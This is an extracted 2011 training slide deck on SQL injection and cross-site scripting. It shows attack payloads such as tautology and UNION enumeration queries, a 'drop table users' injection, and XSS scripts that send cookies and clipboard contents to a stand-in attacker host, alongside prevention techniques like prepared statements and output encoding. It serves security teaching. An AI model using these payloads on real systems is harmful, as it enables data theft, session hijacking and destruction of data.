SQL Injection & XSS Slides

Understanding SQL Injection (Prevention Mechanism)
Adzmely Mansor adzmely@gmail.com
Tuesday, May 17, 2011
Purpose
understanding pen-test existing internal application good practice / methods sql injection
prevention in programming
Not a license to KILL !!!

SQL Injection
How strong Firewall rules - easily walk
through port 80
Inserting SQL meta-characters/commands

into web based input methods: {GET,POST}
Well known and exploited technique

SQL Injection
Malicious User Firewall
Port 80/443
Web Server Openly launch attack from compromised server

A Threat?
Albert Gonzalez 130 millions credit card number Used SQL - Injection technique Steal data from internal corporate network Sentenced 20 years in March 2010 x-Informer to US secret service to catch
hackers
A Threat?
Sept 19, 2010 during Swedish General
Election a voter attempted a code injection as part of a write in vote.
SQL Injection? How?

http://victim.org/news.php?id=234 SELECT * FROM News where news_id = $_GET[id] SELECT * FROM News where news_id = 234
SQL Injection? How?

http://victim.org/news.php?id=234 and 1=1 SELECT * FROM News where news_id = $_GET[id] SELECT * FROM News where news_id = 234 and 1=1
Sample Attacks
comments/inline comments admin - select username,password where
username=admin-- and password=pass;
Sample Attacks
comments/inline comments or 1=1- select username,password where
username=admin and password= or 1=1-- ;
SQL Injection: 3 types

Inband: extracted using same channel Out-of-band: extracted using different
channel - email observation
Inferential: no actual data transfer, behavior
Blind SQL Injection

results not visible to attacker logical statement to attack time consuming/intensive heavy load on web server from single
source of IP
automation tools - sqlmap/sqlplus/etc

Blind SQL Injection

Conditional Test and 1=1 / and 1=2 Conditional Errors select 1/0 from users where
username=user1;
Time Delay measure execution time

Vulnerability Testing
GET/POST methods unescaped numerical value single quote unescaped string double quotes unescaped string etc
Vulnerability Testing
look for page errors? - 500 Server Error redirect page? SQL/ODBC Errors page differences and 1=1-- , and 1=2-Tuesday, May 17, 2011
Test for SQL Injection

unescaped numerical select * from news
where id = $_GET[id]
add some sql statement / blind? ?id=23 and / ?id=23 and {1=1,1=2} error? differences

unescaped numerical Open Lesson 1a URL do some test try to detect sql injection vulnerability try to exploit

unescaped numerical with addslashes() or
magic quotes?
select * from news

URL
where id = addslashes($_GET[id])
try to do same test in Lesson 1b injectable?


unescaped single quote - select * from news
using single quote to produce

error / differences blind technique
try to inject with some simple


unescaped single quote Open Lesson 2a URL do some test try to detect sql injection vulnerability try to exploit

unescaped double quotes - select * from news
using single quote to produce

error / differences blind technique
try to inject with some simple


unescaped double quotes Open Lesson 2b URL do some test try to detect sql injection vulnerability try to exploit

unescaped statement with parentheses update users set password=md5
($_POST[pass]) where id = ....
injectable pass = abc); -Tuesday, May 17, 2011

POST Method Open Lesson 3 URL do some test try to detect sql injection vulnerability
In Band: Stealing Data

getting table list nd how many columns in query use union select nd database name: mysql database()
function in union select
use mysql information_schema tables use group_concat in query


nding how many columns in query using ORDER by ORDER by 1- ORDER by 2- ORDER by 3- errors means found the number of
selected columns

nding how many columns in query using union + select use dummy strings to nd number of
columns in query

using group concat SELECT group_concat(name) from
users;
return query datas in single column


getting table list from
information_schema.tables
SELECT group_concat(table_name)
FROM information_schema.tables WHERE table_schema = dbname;

getting table columns from
information_schema.columns
SELECT group_concat(column_name)
FROM information_schema.columns WHERE table_name = tname;

Exercise: Open any previous Lesson URL retrieve passwords from un-named
tables in the same DB
Stacking Queries
; drop table users; -supported not supported unknown
Random Test
Choose your internal website search for sql injection possibilities do some penetration test
SQL Injection Tools

sqlmap python base CLI - command line interface fully automated penetration test DB nger prints DB, Tables enumerations
Prevention
Whose Responsibility? No SQL database, connector, or
framework can prevent SQL injection all the time
Security is the application developers job

Monitoring
Never reveal error messages
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''' at line 1 INSERT INTO user (username, password, admin) VALUES ('Mr. O'Neil', 'password', false); <?php if (! $query) { die (Error: mysql_error() ); } .... Not only does this confuse/anger the visitor, but reveals sensitive information about your application
This is BAD
Monitoring
Error Handling Never show errors in production Log errors so they can be xed or email
them
Check Regularly This way, you will see potential bugs/security

holes, and you can x them promptly.
Log Error
function sql_failure_handler($query, $error) { $msg = htmlspecialchars (Failed Query: {$query}<br>SQL Error: {$error}); error_log ($msg, 3, /home/site/logs/sql_error_log); if ( dened(debug) ) { return $msg; } return Requested page is temporarily unavailable, please try again later.; } mysql_query ( $query ) or die(sql_failure_handler($query, mysql_error()));
Prevention
Escaping Input Prevents SQL Injection.
Prevention
Simply adding addslashes() or magic_quotes
enough?
$id = addslashes($_GET[id]) ?
Escaping & Filtering

<?php $id = $_GET[id]; $category = $_GET[category]; $sql = SELECT * from News WHERE id = {$id} AND category = {$category}; mysql_query ($sql) or die(sql_failure_handler($query, mysql_error()));

SELECT * from News WHERE id = 254 AND category = ict
type casting - integer
escape special character by using backslash

<?php $id = (int) $_GET[id]; $category = mysql_real_escape_string($_GET[category]); $sql = SELECT * from News WHERE id = {$id} AND category = {$category}; mysql_query ($sql) or die(sql_failure_handler($query, mysql_error()));
Escaping Methods
mysql_real_escape_string() addslashes() Class Object method such PDO $pdo->quote() method not available to all DB types !!! multiple escaping method? No. One is enough!
Prevention
using addslashes() ? - unescaped numerical
$qry = "SELECT * FROM\ tblTest WHERE \ TestID = " . addslashes($_GET['id']);
What addslashes() do? problem solved?
Prevention
using mysql_real_escape_string() ? - on
unescaped numerical
$sql = "SELECT * FROM tblTest WHERE TestID=".mysql_real_escape_string($_GET['id']);
What mysql_real_escape_string() do? problem solved?
Prevention
unescaped numerical - use type casting
(int) $_GET[id]
Magic Quotes
Cannot simply rely on Magic Quotes Turning On Magic Quotes will not solved all
your problems - eg: unescaped numerical variable
Prevention
Quoting all arguments since single quotes are always escaped, however for numerical always numeric
casting
combining with addslashes or mysql_real_escape_string this technique prevents SQL Injection
Like Quadary
SELECT * messages WHERE subject LIKE
{$sub}%
% used as wild card _ (underscore) represent any character $sub = mysql_real_escape_string(%_) still %_ - no changes
Like Quadary
large amount of data queried more memory usage slow down database slow down process / server possibilities of Denial of Service (DOS)
attack
Like Quadary
Solution - addcslashes() customs escaped characters
$sub = addcslashes ( mysql_real_escape_string(%something...), %_);
The Best Solution

Use Placeholder/Paramater - eg: PHP
MySQL/PDO
$stmt = $pdo->prepare("SELECT * FROM fruit WHERE name = ?"); $stmt->execute(array("Apple"));
You dont need to deal with escaping data because its done by the PDO library.
Code Quality also Increases
No more nasty concatenation No more hoping every programmer escaped query properly
Parameter Placeholder
Query need a dynamic value:
SELECT * from News WHERE id = 254
user input
Query parameter takes place of dynamic
value: SELECT * from News WHERE id = ?
parameter placeholder
How the database parse it
SELECT
expr-list
query
FROM
simpletable
News id
WHERE
expr
equality
= ?
parameter placeholder
How the database execute it
SELECT
expr-list
query
FROM
simpletable
News id
WHERE
expr
equality
= 254
parameter value
Interpolation
SELECT
expr-list
* id
query
FROM
simpletable
News
equality
= 254
WHERE
expr
OR
254
SQL Injection
How the database execute it
SELECT
expr-list
query
FROM
simpletable
News id
WHERE
expr
equality
= 254 OR TRUE
no parameter can change the tree
Query Parameter Prevent SQL Injection.
Whitelist Map
http://example.org/news.php?sort=date&dir=up
<?php $sortorder = $_GET[sort]; $direction = $_GET[dir];
unsafe
$sql = SELECT * FROM News ORDER BY {$sortorder} {$direction}; $query = mysql_query($sql);

sql injection
Whitelist Map
Fix with a Whitelist Map
<?php $sortorders = array ( status => status, date => sysdate); $directions = array ( up => ASC, down => DESC); $sortorder_default $direction_default = status; = ASC;
Whitelist Map
Map User Input to Safe SQL
<?php if ( isset ( $sortorders [ $_GET[sort] ] ) ) { $sortorder = $sortorders [ $_GET[order] ]; } else { $sortorder = $sortorder_default; }
Whitelist Map
Map User Input to Safe SQL
<?php if ( isset ( $directions [ $_GET[dir] ] ) ) { $direction = $directions [ $_GET[order] ]; } else { $direction = $direction_default; }
Whitelist Map
Interpolate Safe SQL
<?php
whitelisted values
$sql = SELECT * FROM News ORDER BY {$sortorder} {$direction}; $query = mysql_query($sql);
Prevention
Limited Database User Access GRANT specic permissions DROP, CREATE, etc should be revoked
from connected DB user
Cross Site Scripting XSS
XSS : Denition
computer security vulnerability in web
application
where information from one context

where it is not trusted is injected to another context where it is trusted be started
from this trusted context and attack can
XSS : Example
simple web application that directly output
the user supplied URL parameter
<?php echo Selamat Datang . $_GET[name];
open lesson1.php?name=Abu Selamat Datang Abu

XSS : Example
javascript injection:
lesson1.php?name=</script>alert(/XSS/);</script>
XSS Threat
XSS is most common injection vulnerability Direct output of user input allows injection
of arbitrary content into website
Firewall? via port 80

HTML tags Active content (Javascript / Flash)
Reective XSS
Simplest form of XSS User input is read from the request
the browser parameters and written directly into the output
Included malicious code is executed within Victims browser has to execute the XSS
triggering request itself
Persistent XSS
Stored / permanent XSS User input is read from a request and
stored in RAW
database le etc example: comments in a blog

Persistent XSS
victims browser visit a website stored user input is read from database and
directly written into the output within victim browser
embedded malicious code get executed
DOM based XSS

is similar to reective XSS but server side doesnt play a role fault is within javascript code victims browser must execute the XSS
request itself
DOM based XSS

usually triggered by working with URL
parameters/URL anchors in Javascript
XSS caused by output in HTML context XSS caused by evaluating - JS eval()

injection
XSS Dangers
Displaying annoying pop-ups Redirect - malware Modication of text and images
(defacement)
Manipulation of client side application logic Theft of clipboard, cookies, passwords XSS traverse rewalls - port 80/443
XSS Test
Displaying pop-ups most commonly used for diagnose and
demonstration of XSS problems
harmless just uses the javascript alert() function <script>alert(1);</script>

XSS: Redirection
used by spammers and malware industry harmless if redirect for advertisement
purposes exploits
dangerous if redirected to malware /
XSS: Redirection
Just modies document.location
<script> document.location = http://www.malware.org; </script>
XSS: Cookies Theft

allow theft of authentication information or
session identiers stored in cookie
doesnt work with httpOnly cookies
XSS: Cookies Theft

just send document.cookie to the attacker
<script> tag = <img src=http://war.com/collect.php?data=; tag = tag + escape(document.cookie) + >; document.write(tag) </script>
XSS: Clipboard Theft

Allow theft of sensitive data from users
clipboard Explorer
Uses clipboardData object in Internet Triggers a security question since IE 7
XSS: Clipboard Theft

IE 7
<script> myClipBoard = clipBoardData.getData(Text); tag = <img src=http://war.com/collect.php?data=; tag = tag + escape(myClipBoard) + >; document.write(tag) </script>
XSS: Theft of Passwords

Mozilla Firefox comes with password safe Known password are lled into form after
page fully loaded be stolen
With XSS attackers passwords cached can
XSS: Manipulating Logic

Example: Fill in support ticket with injectable XSS
persistent method
Support engineer open ticket steal cookies change submit action - onSubmit
eventhandlet
Different HTML contexts

Outside of HTML tags Within HTML tags Within URL HTML tag attributes In stylesheet attributes/tags In javascript / javascript strings
Injection outside HTML tags

Raw user input is inserted between HTML
tags
<body> ... Hello <?php echo $_GET[name]; ?> ! </body>
Injection of new HTML tags

<body> ... Hello <script>.....</script> ! </body>

Filter function strip_tags() remove html
tags
<body> ... Hello <?php echo strip_tags($_GET[name]); ?> ! </body>
In the output all <script> tags are removed

The encoding function htmlspecialchars()
encodes special characters into HTML entities (or htmlentities())
In the output special chars are disarmed

<body> ... Hello <script> .... </script> ! </body>
<body> ... Hello <?php echo htmlspecialchars($_GET[name]); ?> ! </body>
Injection within HTML tags

Raw user input is inserted within a HTML
tag attribute
<img src=abc.png title=<? echo $_GET[a]; ?>> <img src=abc.png title=<? echo $_GET[a]; ?>> <img src=abc.png title=<? echo $_GET[a]; ?>>
Injection with eg. an event-handler

<img src=abc.png title=x onmouseover=...> <img src=abc.png title=x onmouseover=...> <img src=abc.png title=x onmouseover=...>

Encoding functions not protecting at all in
case of non standard HTML
<img src=abc.png title=<? echo htmlentities($_GET[a]); ?>>
Injection always possible because no quotes

are used around attribute values
<img src=abc.png title=x onmouseover=...>

HTML attribute values should be within
double quotes
Use encoding functions as protection and

encode the appropriate quotes
<img src=abc.png title=<? echo htmlentities($_GET[a]); ?>>
Injection is no longer possible because

breaking out the attribute context is not possible
Injection within URL attribute

Raw URLs is inserted into HTML tag URL
atribute
<img src=<?php echo $_GET[a]); ?>>
Injection: eg. Javascript URLs

<img src=javascript: alert(123);>
<a href=<?php echo $_GET[b]); ?>> Click Here </a>
<a href=javascript: alert(123);> Click Here </a>
Injection within URL attribute

To secure the output, encoding function
must be used but they are not sufcient out attribute value, but the URL type javascript allowed URL types
XSS problem is not the possibility to break input lter should use a whitelist of
Injection in Stylesheet
Raw user input is inserted into information Injected are IE expression, Javascript URLs
or Mozillas moz-binding
<style> a { color: expression(alert(1)); } </style> <style> a { color: <? echo $_GET[color]; ?>; } </style>
Injection in Javascript
Raw user input is inserted into javascript Injection is normal Javascript
<script> var str = name: ; alert(123);//; document.write(str); </script> <script> var str = name: <? echo $_GET[name]; ?>; document.write(str); </script>
Thank You
http://blog.xjutsu.com adzmely@gmail.com

SQL Injection &amp; XSS Slides

Hochgeladen von

Dokumentinformationen

Copyright

Verfügbare Formate

Dieses Dokument teilen

Dokument teilen oder einbetten

Freigabeoptionen

Stufen Sie dieses Dokument als nützlich ein?

Sind diese Inhalte unangemessen?

Copyright:

Verfügbare Formate

SQL Injection &amp; XSS Slides

Hochgeladen von

Copyright:

Verfügbare Formate

Understanding SQL Injection (Prevention Mechanism)

Adzmely Mansor adzmely@gmail.com

Tuesday, May 17, 2011

Not a license to KILL !!!

Inserting SQL meta-characters/commands

Well known and exploited technique

Web Server Openly launch attack from compromised server

Sept 19, 2010 during Swedish General

Election a voter attempted a code injection as part of a write in vote.

Tuesday, May 17, 2011

SQL Injection? How?

Tuesday, May 17, 2011

SQL Injection? How?

Tuesday, May 17, 2011

Tuesday, May 17, 2011

Tuesday, May 17, 2011

SQL Injection: 3 types

Inferential: no actual data transfer, behavior

Tuesday, May 17, 2011

Blind SQL Injection

automation tools - sqlmap/sqlplus/etc

Blind SQL Injection

Time Delay measure execution time

Test for SQL Injection

Test for SQL Injection

Test for SQL Injection

select * from news

try to do same test in Lesson 1b injectable?

Test for SQL Injection

using single quote to produce

try to inject with some simple

Test for SQL Injection

Test for SQL Injection

using single quote to produce

try to inject with some simple

Test for SQL Injection

Test for SQL Injection

injectable pass = abc); -Tuesday, May 17, 2011

Test for SQL Injection

In Band: Stealing Data

use mysql information_schema tables use group_concat in query

In Band: Stealing Data

In Band: Stealing Data

Tuesday, May 17, 2011

In Band: Stealing Data

return query datas in single column

In Band: Stealing Data

FROM information_schema.tables WHERE table_schema = dbname;

Tuesday, May 17, 2011

In Band: Stealing Data

Tuesday, May 17, 2011

In Band: Stealing Data

Tuesday, May 17, 2011

; drop table users; -supported not supported unknown

Tuesday, May 17, 2011

Tuesday, May 17, 2011

SQL Injection Tools

framework can prevent SQL injection all the time

Security is the application developers job

Tuesday, May 17, 2011

Check Regularly This way, you will see potential bugs/security

Tuesday, May 17, 2011

Tuesday, May 17, 2011

Tuesday, May 17, 2011

SQL Injection & XSS Slides

SQL Injection & XSS Slides